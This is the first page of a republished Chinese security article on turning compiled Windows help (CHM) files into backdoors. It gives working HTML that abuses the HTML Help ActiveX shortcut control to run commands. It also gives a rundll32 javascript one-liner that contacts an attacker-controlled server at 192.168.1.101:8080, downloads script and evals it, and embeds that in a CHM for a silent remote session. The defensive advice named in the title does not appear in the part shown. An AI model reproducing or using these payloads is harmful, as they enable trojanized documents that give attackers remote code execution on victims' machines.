高级组合技打造捆绑后门及防御建议

发布时间：2018-11-14 23:38:57 所属栏目：评论来源：CanMeng

导读：一、CHM简介在介绍怎么使用CHM来作为后门之前，首先要知道CMH是什么东西。 CHM(Compiled Help Manual)即已编译的帮助文件。它是微软新一代的帮助文件格式，利用HTML作源文，把帮助内容以类似数据库的形式编译储存。CHM支持Javas cript、VBs cript、Active

副标题[/!--empirenews.page--]

一、CHM简介

在介绍怎么使用CHM来作为后门之前，首先要知道CMH是什么东西。

CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式，利用HTML作源文，把帮助内容以类似数据库的形式编译储存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等，并可以通过URL与Internet联系在一起。因为使用方便，形式多样也被采用作为电子书的格式。

二、CHM制作

CHM的制作方法很多。有多款工具可以使用，这里就不在做详细的介绍了。本次测试使用了EasyCHM来制作CHM文件，使用起来非常简单。

新建如下目录，文件内容随意：

高级组合技打造捆绑后门及防御建议

打开EasyCHM，新建->浏览。选择该目录。默认文件类型：

高级组合技打造捆绑后门及防御建议

点击确认，即可看到预览的CHM文件：

高级组合技打造捆绑后门及防御建议

选择编译，即可编译成CHM文件。

三、CHM Execute Command

14年的时候@ithurricanept 在twitter上发了一个demo，通过CHM运行计算器：

高级组合技打造捆绑后门及防御建议

利用代码如下：

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command"    value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

将以上代码写入html，置于工程目录进行编译，生成CHM文件，运行此文件，弹出计算器：

高级组合技打造捆绑后门及防御建议

四、去除弹框

有测试过nishang Out-CHM的同学会发现，运行生成的CHM文件的时候会看到明显的弹框。就像这样:

高级组合技打造捆绑后门及防御建议

某个晚上突然脑洞了一下，想到了一个好的方式来让他不显示弹框，即结合使用JavaScript Backdoor。经过测试，成功实现在不弹框的情况下获取meterpreter会话，此次测试使用一个我修改过的python版 JSRat.ps1 ，地址为：https://github.com/Ridter/MyJSRat。使用方式详见 readme。

以下为完整的测试过程：

1. 结合CHM + JSBackdoor

使用交互模式的JSRat server：

python MyJSRat.py -i 192.168.1.101 -p 8080

高级组合技打造捆绑后门及防御建议

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下：

rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c    taskkill /f /im rundll32.exe",0,true);}

经过多次测试，成功将以上命令写入chm，其Html代码为：

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>This is a demo ! <br><OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM    name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe,javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","    http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

（编辑：济源站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!

1/5

尾页